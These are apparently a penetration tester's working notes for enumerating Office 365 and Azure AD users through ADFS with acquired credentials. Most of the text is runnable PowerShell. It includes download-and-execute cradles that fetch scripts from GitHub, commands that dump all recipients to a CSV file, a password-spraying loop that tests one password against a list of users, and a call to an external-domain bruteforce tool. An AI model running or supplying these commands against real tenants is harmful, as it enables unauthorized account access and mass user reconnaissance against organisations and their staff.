ADFS Notes

ADFS Notes

Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials.

Install Apps

Download and install visual studio 10

Downoad and install the Lync SDK
https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated)
http://go.microsoft.com/fwlink/?LinkID=248583

Download and install Microsoft Online Services Sign-In Assistant for IT Professionals RTW 
http://go.microsoft.com/fwlink/?LinkID=286152

get-command -Module MSOnline
get-command -Module MSOnlineExtended

Download and Install the Azure Active Directory Module for Windows PowerShell (64-bit version)
http://go.microsoft.com/fwlink/p/?linkid=236297




Import the scripts

git clone https://github.com/NetSPI/PowerShell

import-module PowerSkype.ps1
import-module Get-ADFSEndpoint.ps1

or 

iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Get-ADFSEndpoint.ps1")
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/PowerSkype.ps1")


Fingerprint Federate and Managed Domains
# Summary: managed = in ms cloud; federated = internally hosted

# Check if domain email is managed or federated
Get-ADFSEndpoint -email [email protected]

Email     : [email protected]
Type      : Federated
Domain    : domain.com
BrandName : domain.com
AuthURL   : https://idp.domain.com/idp/profile/SAML2/POST/SSO


# Check if domain is managed or federated
Get-SkypeFederation -domain domain.com

Domain                 : domain.com
MS=MS*                 : True
_sip._tcp              : True
_sip._tls              : False
_sipfederationtls._tcp : False

# Get skype status
Get-SkypeStatus -email [email protected]


Information Gathering for Managed Domains

# Get list of emails for azure services - must be managed domain 
# Reference: https://msdn.microsoft.com/en-us/library/azure/dn194123(v=azure.98).aspx
# Reference: https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
# See references for other command examples

# Get Domain Users 
$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "[email protected]", $PWord
connect-msolservice -credential $credentials
Get-MsolDomain
Get-MsolUser


Information Gathering for federated Domains

# Get Domain Users
$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "[email protected]", $PWord
New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection
Get-PSSession

 Id Name            ComputerName    State         ConfigurationName     Availability
 -- ----            ------------    -----         -----------------     ------------
  2 Session2        outlook.offi... Opened        Microsoft.Exchange       Available

Enter-PSSession 2
Get-Command | Select-Object Name

Execute a single command and store results to excel file - get domain user information

$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "[email protected]", $PWord
Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:\temp\domain_users.csv -NoTypeInformation

# Super slow / dirty dictionary attack option
$Users = Get-Content C:\temp\users.txt
$Password = "Password"
$Users | 
ForEach-Object {
    Write-Output "Testing $Password on $_"

    $PWord = ConvertTo-SecureString -String "$Password" -AsPlainText -Force
    $credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "$_", $PWord
    Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {get-user | select-object name -expandproperty name} 
}


also.... https://blog.netspi.com/targeting-passwords-managed-federated-microsoft-accounts/
https://gallery.technet.microsoft.com/scriptcenter/Invoke-ADFSSecurityTokenReq-09e9c90c
https://github.com/NetSPI/PowerShell/blob/master/Invoke-ExternalDomainBruteforce.ps1
Invoke-ExternalDomainBruteforce -list .\emails.txt -password 'Password!' -domain company.com | ft -AutoSize


More notes from: https://gist.github.com/skillriver/783295e9c4bc0da63cc71eb7833535c0

# connect to azure and office365 with powershell
# 2016-01-13

# get password
$cred = Get-Credential

#office365 session
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $cred -Authentication Basic -AllowRedirection

Import-PSSession $Session

#azure AD connect
Connect-MsolService -Credential $cred

more notes from: https://gist.githubusercontent.com/skillriver/783295e9c4bc0da63cc71eb7833535c0/raw/c3e73f28c23987190b0d7f5dca6bc4985aca0010/GroupAzureADUPNSuffix.ps1

# Require the Azure Active Directory PowerShell Module
Import-Module MSOnline

# Credential and Connect
$msolcred = Get-Credential
Connect-MsolService -Credential $msolcred

# Group count of all UPN suffixes in your Azure AD
Get-MsolUser -All | Select UserPrincipalName, @{Name="UPNSuffix"; Expression={($_.UserPrincipalName.Split("@",2)[1])}} | Group UPNSuffix